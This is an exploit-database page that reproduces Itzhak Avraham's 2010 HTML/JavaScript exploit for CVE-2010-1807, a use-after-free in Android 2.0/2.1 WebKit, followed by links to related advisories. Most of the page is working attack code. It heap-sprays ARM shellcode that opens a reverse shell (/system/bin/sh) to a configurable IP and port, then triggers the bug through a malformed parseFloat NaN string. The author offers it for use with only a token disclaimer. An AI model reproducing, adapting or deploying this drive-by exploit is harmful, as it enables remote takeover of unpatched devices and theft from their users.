Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormItzhak AvrahamPACKETSTORM:95850
HistoryNov 16, 2010 - 12:00 a.m.

Android 2.0 / 2.1 Use-After-Free Remote Code Execution

2010-11-1600:00:00
Itzhak Avraham
packetstormsecurity.com
67

0.922 High

EPSS

Percentile

98.7%

JSON
`# Exploit Title: Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit  
# Date: 14/11/2010  
# Author: Itzhak Avraham, mj  
# Tested on: Droid 2.1  
# CVE : CVE-2010-1807  
  
  
*Better exploit (better rate and more flexible for changes, also shorter  
shellcode) than what you have, plus, it's also verified. Enjoy!  
More details at : *  
http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html*  
  
  
<html>  
<head>  
<script>  
//This code is only for security researches/teaching purposes,use at your own risk!  
  
// bug = webkit remote code execution CVE-2010-1807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1807  
//patched= android 2.2, some said it works on some devices with 2.2.  
//originally noticed/written by mj(good job man!)  
//new exploit version by Itzhak Zuk Avraham (itz2000[AT]GMAIL[DOT]COM) - http://imthezuk.blogspot.com  
  
var ip = unescape("\ua8c0\u0100"); // ip = 192.168.0.1  
var port = unescape("\u3930"); //port 12345 (hex(0x3039))  
//var ip = e.g: unescape("\u000a\u0202"); //ip = 10.0.2.2  
  
function trigger()  
{  
var span = document.createElement("div");  
document.getElementById("BodyID").appendChild(span);  
span.innerHTML = -parseFloat("NAN(ffffe00572c60)"); //trigger use-after-free  
}  
function exploit()  
{   
var nop = unescape("\u33bc\u0057"); //LDREQH R3,[R7],-0x3C for nopping  
do  
{  
nop+=nop;  
} while (nop.length<=0x1000);  
var scode = nop+unescape("\u1001\ue1a0\u0002\ue3a0\u1001\ue3a0\u2005\ue281\u708c\ue3a0\u708d\ue287\u0080\uef00\u6000\ue1a0\u1084\ue28f\u2010\ue3a0\u708d\ue3a0\u708e\ue287\u0080\uef00\u0006\ue1a0\u1000\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1001\ue3a0\u703f\ue3a0\u0080\uef00\u0006\ue1a0\u1002\ue3a0\u703f\ue3a0\u0080\uef00\u2001\ue28f\uff12\ue12f\u4040\u2717\udf80\ua005\ua508\u4076\u602e\u1b6d\ub420\ub401\u4669\u4052\u270b\udf80\u2f2f\u732f\u7379\u6574\u2f6d\u6962\u2f6e\u6873\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u2000\u0002");  
scode += port;  
scode += ip;  
scode += unescape("\u2000\u2000");  
target = new Array();  
for(i = 0; i < 0x1000; i++)  
target[i] = scode;  
for (i = 0; i <= 0x1000; i++)  
{  
document.write(target[i]+"<i>");  
if (i>0x999)  
{  
trigger();  
}  
}  
}  
</script>  
</head>  
<body id="BodyID">  
Enjoy!  
<script>  
exploit();  
</script>  
</body>  
</html>  
  
Twitter account : @ihackbanme  
  
  
`

Related

veracode 1
seebug 4
cve 1
checkpoint_advisories 2
threatpost 2
android 1
prion 1
canvas 1
packetstorm 1
exploitpack 2
debiancve 1
ubuntucve 1
exploitdb 2
nessus 13
openvas 19
securityvulns 2
freebsd 1
redhat 1
oraclelinux 1
fedora 4
gentoo 1
veracode
veracode
Denial Of Service (DoS)
2020-04-10 00:53:17
seebug
seebug
Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit
2014-07-01 00:00:00
Android 2.0/2.1 Use-After-Free Remote Code Execution on Webkit
2010-11-17 00:00:00
Android 2.0-2.1 - Reverse Shell Exploit
2014-07-01 00:00:00
cve
cve
CVE-2010-1807
2010-09-10 19:00:00
checkpoint_advisories
checkpoint_advisories
Apple Safari Webkit Floating Point Data Type Code Execution - Ver2 (CVE-2010-1807)
2014-01-07 00:00:00
Apple Safari Webkit Use-After-Free Code Execution- Ver2 (CVE-2010-1807)
2014-01-28 00:00:00
threatpost
threatpost
Researcher Publishes Android Browser Exploit
2010-11-08 15:26:31
Apple Plugs Safari Drive-by Download Security Holes
2010-09-08 13:57:18
android
android
Use-After-Free Remote
2010-11-14 00:00:00
prion
prion
Design/Logic Flaw
2010-09-10 19:00:00
canvas
canvas
Immunity Canvas: CVE_2010_1807
2010-09-10 19:00:00
packetstorm
packetstorm
Android 2.0 / 2.1 Reverse Shell Exploit
2010-11-05 00:00:00
exploitpack
exploitpack
Google Android 2.02.1 - Use-After-Free Remote Code Execution on Webkit
2010-11-15 00:00:00
Google Android 2.0 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222TCP)
2010-11-05 00:00:00
debiancve
debiancve
CVE-2010-1807
2010-09-10 19:00:00
ubuntucve
ubuntucve
CVE-2010-1807
2010-09-10 00:00:00
exploitdb
exploitdb
Google Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit
2010-11-15 00:00:00
Google Android 2.0 &lt; 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP)
2010-11-05 00:00:00
nessus
nessus
Mac OS X : Apple Safari < 5.0.2 / 4.1.2
2010-09-08 00:00:00
Safari < 5.0.2 Multiple Vulnerabilities
2010-09-08 00:00:00
Fedora 13 : webkitgtk-1.2.5-1.fc13 (2010-15957)
2010-10-20 00:00:00
openvas
openvas
Apple Safari Multiple Vulnerabilities (Sep 2010)
2010-09-15 00:00:00
Apple Safari Multiple Vulnerabilities - Sep10
2010-09-15 00:00:00
FreeBSD Ports: webkit-gtk2
2010-11-17 00:00:00
securityvulns
securityvulns
About the security content of Safari 5.0.2 and Safari 4.1.2
2010-09-14 00:00:00
Apple WebKit / Safari multiple security vulnerabilities
2010-09-14 00:00:00
freebsd
freebsd
Webkit-gtk2 -- Multiple Vulnabilities
2010-10-01 00:00:00
redhat
redhat
(RHSA-2011:0177) Moderate: webkitgtk security update
2011-01-25 00:00:00
oraclelinux
oraclelinux
webkitgtk security update
2011-02-10 00:00:00
fedora
fedora
[SECURITY] Fedora 12 Update: webkitgtk-1.2.5-1.fc12
2010-10-19 07:09:06
[SECURITY] Fedora 13 Update: webkitgtk-1.2.5-1.fc13
2010-10-19 07:21:56
[SECURITY] Fedora 13 Update: webkitgtk-1.2.6-1.fc13
2011-01-07 20:01:55
gentoo
gentoo
Multiple packages, Multiple vulnerabilities fixed in 2011
2014-12-11 00:00:00

0.922 High

EPSS

Percentile

98.7%

JSON
Related for PACKETSTORM:95850
veracode1seebug4cve1checkpoint_advisories2threatpost2android1prion1canvas1packetstorm1exploitpack2debiancve1ubuntucve1exploitdb2nessus13openvas19securityvulns2freebsd1redhat1oraclelinux1fedora4gentoo1